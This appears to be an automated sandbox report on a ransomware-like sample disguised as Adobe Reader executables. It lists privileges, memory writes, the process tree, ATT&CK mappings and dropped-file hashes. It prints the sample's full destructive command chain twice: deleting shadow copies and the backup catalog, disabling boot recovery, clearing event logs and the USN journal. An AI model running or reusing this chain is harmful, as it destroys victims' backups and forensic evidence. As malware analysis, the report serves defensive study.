wevtutil.exe Token: SeSecurityPrivilege 1148 wevtutil.exe Token: SeBackupPrivilege 1148 wevtutil.exe Token: SeSecurityPrivilege 2052 wevtutil.exe Token: SeBackupPrivilege 2052 wevtutil.exe Token: SeSecurityPrivilege 2388 wevtutil.exe Token: SeBackupPrivilege 2388 wevtutil.exe Token: SeShutdownPrivilege 1404 powercfg.exe Token: SeShutdownPrivilege 1928 powercfg.exe Token: SeShutdownPrivilege 1896 powercfg.exe Token: SeShutdownPrivilege 1200 powercfg.exe Token: SeIncreaseQuotaPrivilege 6976 WMIC.exe Token: SeSecurityPrivilege 6976 WMIC.exe Token: SeTakeOwnershipPrivilege 6976 WMIC.exe Token: SeLoadDriverPrivilege 6976 WMIC.exe Token: SeSystemProfilePrivilege 6976 WMIC.exe Token: SeSystemtimePrivilege 6976 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2860 wrote to memory of 2156 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 31 PID 2860 wrote to memory of 2156 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 31 PID 2860 wrote to memory of 2156 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 31 PID 2860 wrote to memory of 2156 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 31 PID 2156 wrote to memory of 2032 2156 cmd.exe 33 PID 2156 wrote to memory of 2032 2156 cmd.exe 33 PID 2156 wrote to memory of 2032 2156 cmd.exe 33 PID 2860 wrote to memory of 2944 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 36 PID 2860 wrote to memory of 2944 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 36 PID 2860 wrote to memory of 2944 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 36 PID 2860 wrote to memory of 2944 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 36 PID 2860 wrote to memory of 2944 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 36 PID 2860 wrote to memory of 2944 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 36 PID 2860 wrote to memory of 2944 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 36 PID 2860 wrote to memory of 2944 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 36 PID 2860 wrote to memory of 2944 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 36 PID 2860 wrote to memory of 2944 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 36 PID 2860 wrote to memory of 2944 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 36 PID 2860 wrote to memory of 2944 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 36 PID 2156 wrote to memory of 2624 2156 cmd.exe 37 PID 
2156 wrote to memory of 2624 2156 cmd.exe 37 PID 2156 wrote to memory of 2624 2156 cmd.exe 37 PID 2156 wrote to memory of 3052 2156 cmd.exe 39 PID 2156 wrote to memory of 3052 2156 cmd.exe 39 PID 2156 wrote to memory of 3052 2156 cmd.exe 39 PID 2156 wrote to memory of 3056 2156 cmd.exe 40 PID 2156 wrote to memory of 3056 2156 cmd.exe 40 PID 2156 wrote to memory of 3056 2156 cmd.exe 40 PID 2156 wrote to memory of 1048 2156 cmd.exe 41 PID 2156 wrote to memory of 1048 2156 cmd.exe 41 PID 2156 wrote to memory of 1048 2156 cmd.exe 41 PID 2156 wrote to memory of 1396 2156 cmd.exe 45 PID 2156 wrote to memory of 1396 2156 cmd.exe 45 PID 2156 wrote to memory of 1396 2156 cmd.exe 45 PID 2156 wrote to memory of 1148 2156 cmd.exe 46 PID 2156 wrote to memory of 1148 2156 cmd.exe 46 PID 2156 wrote to memory of 1148 2156 cmd.exe 46 PID 2156 wrote to memory of 2052 2156 cmd.exe 47 PID 2156 wrote to memory of 2052 2156 cmd.exe 47 PID 2156 wrote to memory of 2052 2156 cmd.exe 47 PID 2156 wrote to memory of 2388 2156 cmd.exe 48 PID 2156 wrote to memory of 2388 2156 cmd.exe 48 PID 2156 wrote to memory of 2388 2156 cmd.exe 48 PID 2156 wrote to memory of 1272 2156 cmd.exe 49 PID 2156 wrote to memory of 1272 2156 cmd.exe 49 PID 2156 wrote to memory of 1272 2156 cmd.exe 49 PID 2156 wrote to memory of 1404 2156 cmd.exe 50 PID 2156 wrote to memory of 1404 2156 cmd.exe 50 PID 2156 wrote to memory of 1404 2156 cmd.exe 50 PID 2156 wrote to memory of 1928 2156 cmd.exe 51 PID 2156 wrote to memory of 1928 2156 cmd.exe 51 PID 2156 wrote to memory of 1928 2156 cmd.exe 51 PID 2156 wrote to memory of 1896 2156 cmd.exe 52 PID 2156 wrote to memory of 1896 2156 cmd.exe 52 PID 2156 wrote to memory of 1896 2156 cmd.exe 52 PID 2156 wrote to memory of 1200 2156 cmd.exe 53 PID 2156 wrote to memory of 1200 2156 cmd.exe 53 PID 2156 wrote to memory of 1200 2156 cmd.exe 53 PID 2860 wrote to memory of 2884 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 54 PID 2860 wrote to memory of 
2884 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 54 PID 2860 wrote to memory of 2884 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 54 PID 2860 wrote to memory of 2884 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 54 PID 2860 wrote to memory of 2884 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 54 PID 2860 wrote to memory of 2884 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 54 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run at boot/logon or at set times, i.e. as a persistence mechanism. Note that no schtasks.exe invocation appears in the process tree below, so any task this sample registers would only be visible in the Task Scheduler store (the Tasks folder / TaskCache registry data), not in the captured command lines; check those artefacts rather than the process tree when confirming persistence.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots. Here the relevant use is destructive: the sample's cmd.exe child (see the process tree below) runs vssadmin delete shadows /all /quiet and wmic shadowcopy delete, deletes the backup catalog with wbadmin, and disables automatic recovery via bcdedit — the classic ransomware recovery-inhibition pattern (ATT&CK T1490) — and in the same command line clears the Setup/System/Security/Application event logs (wevtutil cl) and the NTFS USN change journal (fsutil usn deletejournal) to hinder forensics. The vssvc.exe, wbengine.exe, vdsldr.exe and vds.exe processes listed at the end of the tree are most likely the service-side activity triggered by these commands rather than independently launched payloads.
Processes
-
C:\Users\Admin\AppData\Local\Temp\08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe"C:\Users\Admin\AppData\Local\Temp\08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe"1⤵
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2860 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet & wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C: & powercfg.exe -x -standby-timeout-ac 0 & powercfg.exe -x -standby-timeout-dc 0 & powercfg.exe -x -hibernate-timeout-ac 0 & powercfg.exe -x -hibernate-timeout-dc 02⤵
- Power Settings
- Suspicious use of WriteProcessMemory
PID:2156 -
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2032
-
-
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2624
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures3⤵
- Modifies boot configuration data using bcdedit
PID:3052
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled no3⤵
- Modifies boot configuration data using bcdedit
PID:3056
-
-
C:\Windows\system32\wbadmin.exewbadmin delete catalog -quiet3⤵
- Deletes backup catalog
PID:1048
-
-
C:\Windows\system32\wevtutil.exewevtutil cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1396
-
-
C:\Windows\system32\wevtutil.exewevtutil cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1148
-
-
C:\Windows\system32\wevtutil.exewevtutil cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2052
-
-
C:\Windows\system32\wevtutil.exewevtutil cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2388
-
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:3⤵PID:1272
-
-
C:\Windows\system32\powercfg.exepowercfg.exe -x -standby-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1404
-
-
C:\Windows\system32\powercfg.exepowercfg.exe -x -standby-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1928
-
-
C:\Windows\system32\powercfg.exepowercfg.exe -x -hibernate-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1896
-
-
C:\Windows\system32\powercfg.exepowercfg.exe -x -hibernate-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1200
-
-
-
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\A3DUtility.exe"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\A3DUtility.exe"2⤵
- Drops startup file
- Loads dropped DLL
- Drops desktop.ini file(s)
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2944
-
-
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroBroker.exe"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroBroker.exe"2⤵
- Drops startup file
- Loads dropped DLL
- Drops desktop.ini file(s)
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:2884
-
-
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe"2⤵
- Drops startup file
- Loads dropped DLL
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:15668
-
-
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32Info.exe"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32Info.exe"2⤵
- Executes dropped EXE
PID:12708
-
-
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AdobeCollabSync.exe"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AdobeCollabSync.exe"2⤵
- Drops startup file
- Loads dropped DLL
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:2092
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet & wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C: & powercfg.exe -x -standby-timeout-ac 0 & powercfg.exe -x -standby-timeout-dc 0 & powercfg.exe -x -hibernate-timeout-ac 0 & powercfg.exe -x -hibernate-timeout-dc 02⤵
- Power Settings
PID:8944 -
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet3⤵
- Interacts with shadow copies
PID:9228
-
-
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete3⤵
- Suspicious use of AdjustPrivilegeToken
PID:6976
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures3⤵
- Modifies boot configuration data using bcdedit
PID:4468
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled no3⤵
- Modifies boot configuration data using bcdedit
PID:4548
-
-
C:\Windows\system32\wbadmin.exewbadmin delete catalog -quiet3⤵
- Deletes backup catalog
PID:4672
-
-
C:\Windows\system32\wevtutil.exewevtutil cl Setup3⤵
- Clears Windows event logs
PID:5596
-
-
C:\Windows\system32\wevtutil.exewevtutil cl System3⤵
- Clears Windows event logs
PID:6616
-
-
C:\Windows\system32\wevtutil.exewevtutil cl Security3⤵
- Clears Windows event logs
PID:15584
-
-
C:\Windows\system32\wevtutil.exewevtutil cl Application3⤵
- Clears Windows event logs
PID:8668
-
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:3⤵PID:5708
-
-
C:\Windows\system32\powercfg.exepowercfg.exe -x -standby-timeout-ac 03⤵
- Power Settings
PID:8288
-
-
C:\Windows\system32\powercfg.exepowercfg.exe -x -standby-timeout-dc 03⤵
- Power Settings
PID:6016
-
-
C:\Windows\system32\powercfg.exepowercfg.exe -x -hibernate-timeout-ac 03⤵
- Power Settings
PID:6100
-
-
C:\Windows\system32\powercfg.exepowercfg.exe -x -hibernate-timeout-dc 03⤵
- Power Settings
PID:12948
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1784
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1588
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:1864
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:1996
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
Direct Volume Access 1
Indicator Removal 4
Clear Windows Event Logs 1
File Deletion 3
Downloads
-
Filesize
1KB
MD5 7fd2214952bfbc04f5e1f4e89ede92c2
SHA1 d619aee73f89b2f3440a63ec79fab23f37573f53
SHA256 6543ad7d8b6701448a45072b2133bb24dc53a23247e1815a8e6d9bfe9cfc28c6
SHA512 f5881a220a6a2d3b2fed0c79b91cbecbe43d2106d21273be74e0df92c16e61a2451157904db5dfe79b9a15a731aa0f3cc93bc3025ca85ba4b3b4603280e5f25b
-
Filesize
7KB
MD5 5f3776bf3d81d4aa6fbc0b4cf0243c52
SHA1 fb1cb7f3612e64e9ab60606f5bc53043162e5f99
SHA256 c8af23a723279bce74bf8d4e4d7acd72f8f2e2df4fb4b78828798a774ec51065
SHA512 06ba2f9faad5989296e52af6828130d8d5aa20be71339ba047340866c61a0ed93cb2af845b32c294a16f74d02a834e436482d63907195cc5ba0458913475ac7f
-
Filesize
1KB
MD5 1a623699d86b1d5131e3afd2c6df213e
SHA1 2db2be794990f697bd403879dd31ed1d6614f100
SHA256 e760a6826149f4f14c8d11bafbf5b472609626e3d8efc4c8bab03ce86fa5d558
SHA512 130a3a1c330cf860bcfebc8d6c280debe799ae6d6751e18fe2913999195f075258e7b7252797ac326b0a5382ae827311622738aff34c39d539f2a0a8fb257a64
-
Filesize
992B
MD5 77a3bbe6b3e65676543f645fee62b749
SHA1 58a77f60ec20f5c600a93796fd3195ebc319e77c
SHA256 f40e833fdcb479c1700f4e5020cfa6f4dbe2f52d51eb819f113ec1379d851734
SHA512 e4e323f6822c5f758906f92643786565905e0e54097468318bcf4bdd3413615450debc64aaa69291b39a7f47e369f6190ad0c9fda2b11c24a5171251ff2de93e
-
Filesize
422KB
MD5 21f965a780a55c0f6233120706151e77
SHA1 775d33f4511b7fac71f4af2c2dfb1e2b5281bb41
SHA256 86dbca0fae2ea3d5701129ceb9b20a2c07e0161f45a855a470c4b718ce66257f
SHA512 3deb2bafa83e54549842aabef9085ef6ec1dbf9ec9bc18fee1561f1bc6a76b88bb93328a1bbf93f72cd4d3f74de63cf19868f79b159ca0c7cc7e4223a05057a6
-
Filesize
531KB
MD5 29ae914d3930e43448e13f8a37de7f85
SHA1 15d536feb5ce570c764db0a89996f1bf6e09568d
SHA256 6089b4f419b93270f855000ec32c5cf6049a2ddd14d90d8e6bb94724639b6a8b
SHA512 40af6fa234438e26039dd7e735adfa8d3d7a3d5dec67eecd7d6a577e8be5795734abbc20f005082ead181f020274289bfaef76e76f0c3aba36b4079618ab51b9
-
Filesize
15KB
MD5 38a0a1717aa07c38a76c7ba5deb38fcb
SHA1 2adabb6a605496112ada1ca77c364f40630b42a1
SHA256 9457e647713ab965ff8e12d6ef1615c68f55076e757167a75a7ccdb55e927210
SHA512 06b482241a4c461b5caefe9569d5436ff6cf2f9fe09102edcc850e956614d9d20d451bd753aeee7113838164ea8a1d1605f938f9dcf15b73c4de87b976a3e0db
-
Filesize
656B
MD5 ada6a0f6dd5ef67b91b247861717bcb5
SHA1 4cbe1608642677dbb28a824956cf3137e0c9928d
SHA256 bfd3a9136ab2983e213370dfcf9033c34620b34f5302de0b4f1725520447c77c
SHA512 69a5ae25919f40e269675ef0c8e12e16980500bf751231b527cf03e87b3a515dfd2d712d1c15be738c640036d6f28621ea71dacd97ed48fc77c9ae746a33921e
-
Filesize
1.0MB
MD5 0633ab1f1760df302427c21fb97c068e
SHA1 5398efde9a05fc151296848374e2d2ea7984d046
SHA256 3fe91e33b27971d27671d111a32070f2aa6f7812d8bdd1a3bfbc041543984ea5
SHA512 a0ce5cf7217a45d1e1ce7fec43d11fbb3a58f9c50169909521bcf86207e59b6b9034b1f39b110aeab6e3444b1676f28f6151a3e295f2e9dae0d8fc98c4d05a8d
-
Filesize
52KB
MD5 54ea0bc0970fadc80d5c7323b344390a
SHA1 e964521b9c2452e7b548649e578730874ad23a95
SHA256 49ee2e2240438a44d100c504975755c72f0dbfdff4d998202d0ed62624bbf782
SHA512 d0e31e5901491554deb1deb852769a2ccd56eb2fc2e80c41ee2bbfd313fc35c1804df2ead642914b588b5b5095b72fc8f49008980dcc5f9758bb2f279ed500f9
-
Filesize
70KB
MD5 9fc32e115dbc5c36eda1e6d37556b8f0
SHA1 84743ffdbd06a601cb18e95e0cff4c6ce6947e5a
SHA256 16d5772f37483c481c08732a67651886be717616fa3f8be0bc6130b93fd6dae7
SHA512 078def9066f979e188c06fe342f8cf2e31e874235a1be7df3cf2bd0b3dfc10aa11c564c2b92a5e3588b85193b117ab51dc538173cef85efdeeaff192a4439449
-
Filesize
70KB
MD5 5b2358f9595c7b0cc48558ae577b1008
SHA1 afa18941bc449a12c27e29ecb6e9d15e12a0a767
SHA256 7940bfb3a33b403e42c1698b86b5f0172b874f48d7f2b8c49f23dad5ae407a37
SHA512 7055382bbd16b20995ad96e1c49a9887bfb4590743becfc9d57757e60f4c08c5819525812f87d7a46fec55b4f1b9e66191c35040525bd8cae36ed472d905dafe
-
Filesize
60KB
MD5 b9a9226b7770dbbaa803f01edb6e97e7
SHA1 a61dcfb098247561a3b04b3a717f4f1a01599eff
SHA256 fc7b04b7744e67b422541bc63f105fe20f9b805c40ac7b5418c15d3aff543ba6
SHA512 380b7400ebc7dcc378cb6210557ae19185f89065853dc7583d357060c9409f7fa29d4ae2f2987eda805184c30a5a2affa9d3d7b98efd7b04fd29bdf51fddbc3d
-
Filesize
57KB
MD5 57c4f841aceaf74711d58444d06dca4a
SHA1 bb2e43ce1d7a25c3cfb981e4ec20ac03005b9cbe
SHA256 c43e630192ecce243b8aa7f1ec826ddf88c7ebbf56c1e49b1f98f8ec6c6726d4
SHA512 f6ae64650ad2c27423e33f81401401b086a7dfa214395fa469124610a90caef3775ed76da62a2b3f4ce2be0d5ca7596ce4255181388a3842af03c05a885401bb
-
Filesize
57KB
MD5 55722e6bb92a1f57c5c060cf02cc77d2
SHA1 89b320e6efa69ec37e737d0c694e448b1192210f
SHA256 ef3ca5cd10eba89964e07429fc2dc45ee47dbfa9a769977b21edbba8de2f150c
SHA512 7dacbadad12a1e0d51d3187cba97c18e2ace4c501fe5903e27c6553fd1afba744eff1b5800d376bdcb595ac5f683e90ca57672a73082264120adcc54d0c5cdef
-
Filesize
52KB
MD5 62b9beff79dffd3102ee6633c80d42d3
SHA1 a3fc284d860b6b24d98bfd89475e09eef5d1a31b
SHA256 b329a93b95706de5bec9d166206214b478328304af336f45f5f626cf2bf66b4c
SHA512 9add0e4ddc202bba5d0871130af3d0af983394ff684bd1bf5406a90f396468aeaf8306b4059b36bb20171f37e7da83d38d5047f56acbec94bfc77be6380fd1cc
-
Filesize
464B
MD5 1bc90d4dc4f6bde1d9feb797420c3947
SHA1 263ecf3e18082c10c41d6f672df069c862fc7fdf
SHA256 5aba49b72121d70e36a1031203406ef5c38821f741f2d488e5b3498e8ea86dd1
SHA512 0fe369c2a9ff51762e2408fca6cff58cd0f6e7aab23d6dbcacdbe18d9cd82ea2925c57ce5b68233299f5ae9219ffeac5eff59f4fc4ea0d9a2ebc1c0dc4aec279